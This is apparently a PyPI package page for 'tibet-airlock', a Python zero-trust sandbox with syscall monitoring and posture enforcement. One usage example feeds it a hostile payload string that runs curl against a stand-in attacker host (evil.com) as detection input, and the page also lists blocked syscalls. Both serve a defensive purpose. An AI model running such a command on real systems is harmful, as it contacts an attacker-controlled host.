Zero-trust sandbox Python operator-surface with TIBET provenance. v0.3.0: airlock-runtime posture enforcer (verdict.v1) — execute() raises AirlockPostureDenied before network I/O when external AI is denied. Pairs with the tibet-airlock-kernel Rust crate for hardened execution.
Project description
tibet-airlock
Zero-trust sandbox with TIBET provenance. Python operator/client surface for the hardened Rust execution kernel.
Naming discipline (since v0.3.0):
tibet-airlockis the Python operator surface (this package — bindings, monitoring, posture enforcement). The hardened Rust execution kernel lives as the separate cratetibet-airlock-kernel(previously published astibet-airlockon crates.io, v0.1.0 yanked).
Install
pip install tibet-airlock
cargo install tibet-airlock-kernel # the Rust execution kernel
Or as part of the TIBET security bundle:
pip install tibet[security]
Airlock-runtime posture enforcement (since 0.3.0)
tibet-airlock is the operator-side enforcer of the
tibet-pol → snaft → cap-bus → tibet-airlock immune-switch pipeline. When a
verdict has been installed, execute() refuses to even open a connection if the
flow is forbidden by the active posture:
import asyncio
from tibet_airlock import Airlock, AirlockPostureDenied
from snaft.posture import consume_verdict # snaft >= 1.4.0
# Receive a verdict.v1 record from tibet-pol via cap-bus:
verdict = {...} # airlock_runtime_verdict.v1 record
decision = consume_verdict(verdict)
airlock = Airlock()
airlock.set_posture(decision)
try:
asyncio.run(
airlock.execute("code:execute", "untrusted_payload", origin="external_ai")
)
except AirlockPostureDenied as e:
print(f"refused: {e}")
# In python_fallback mode: "deny_external_ai_inbound ON (intent=code:execute)"
# No socket was opened. Operator/local diagnostics still pass through.
The invariant — "Als de bolle airlock-runtime wegvalt, mag extern AI-verkeer
niet meer binnen" (Jasper 2026-05-29) — is honored at this layer: when the
posture has deny_external_ai_inbound=True, drop_external_traffic=True, or
isolate_session=True, no network I/O is attempted for matching origins. Local
diagnostics + operator-approved repair flows still pass through.
Reference: Codex policy 2026-05-29 (immune-switch ladder).
Use with airlock kernel (full isolation)
# Terminal 1: start the airlock kernel
cargo install tibet-airlock-kernel
tibet-airlock-kernel
# Terminal 2: Python
from tibet_airlock import Airlock
result = Airlock.run("code:execute", "print('hello world')")
print(result.status) # 200
print(result.safe) # True
print(result.roundtrip_ms) # 0.6
print(result.token) # TIBET provenance token
Use SNAFT directly (no binary needed)
from tibet_airlock import SnaftMonitor
# Monitor syscalls for an intent
monitor = SnaftMonitor("code:execute")
monitor.log_syscall("sys_write") # OK
monitor.log_syscall("sys_socket") # VIOLATION - network access!
decision = monitor.triage()
print(decision.is_safe) # False
print(decision.violations) # ['sys_socket (blocked: dangerous syscall for any intent)']
# Or scan a payload string
monitor = SnaftMonitor("code:execute")
detected = monitor.scan_payload("import os; os.system('curl evil.com')")
decision = monitor.triage()
print(decision.is_kill) # True
How it works
Intent -> Snapshot Wake (<0.01ms) -> SNAFT Monitor -> Triage -> TIBET Token
- Intent routing — each intent maps to a pre-warmed microVM snapshot
- SNAFT monitoring — every syscall checked against intent-specific allowlist
- Triage — violations = instant kill, clean = graceful shutdown
- TIBET token — cryptographic proof of what happened (the 4 dimensions: erin, eraan, eromheen, erachter)
Blocked syscalls (always dangerous)
sys_ptrace, sys_socket, sys_connect, sys_dlopen, sys_fork, sys_clone, sys_mount, sys_reboot, sys_kexec_load
Part of TIBET
- Rust binary: crates.io/crates/tibet-airlock
- Full ecosystem:
pip install tibet[full](28 packages) - Website: ainternet.org
Built by Humotica for the AInternet.
License
MIT
Credits
Designed by Jasper van de Meent. Built by Jasper and Root AI as part of HumoticaOS.
Stack-positie: Groep agentic · Bootstrap = OSAPI-handshake naar tibet + jis (fail → snaft-rule + tibet-pol-rapport) · ← tibet-phantom · See STACK.md · See demo/golden-path/ for the spine end-to-end.
Enterprise
For private hub hosting, SLA support, custom integrations, or compliance guidance:
| Enterprise | enterprise@humotica.com |
| Support | support@humotica.com |
| Security | security@humotica.com |
See ENTERPRISE.md for details.
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file tibet_airlock-0.3.0.tar.gz.
File metadata
- Download URL: tibet_airlock-0.3.0.tar.gz
- Upload date:
- Size: 15.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
de3aff1d42edc27eb497a8f4134a9464cef07a9a0821e103ba25562ad6893497
|
|
| MD5 |
b695348e57586894d6dba402651b1f71
|
|
| BLAKE2b-256 |
77c1bb45afae3262c1c306416c61f37285d37c4c51bc8d640c2e3d06a883def6
|
File details
Details for the file tibet_airlock-0.3.0-py3-none-any.whl.
File metadata
- Download URL: tibet_airlock-0.3.0-py3-none-any.whl
- Upload date:
- Size: 11.1 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
671bbde1f0cdb585bae88a97c38112bc52afd8c06b80ab6837cbbbe8563004ca
|
|
| MD5 |
34b5ee6ff1e40a9fd79b133a0c79a894
|
|
| BLAKE2b-256 |
53ef9b41c1cfcce720ba7f829228b0e0c844751921aef4c6ee61ef90192063dc
|
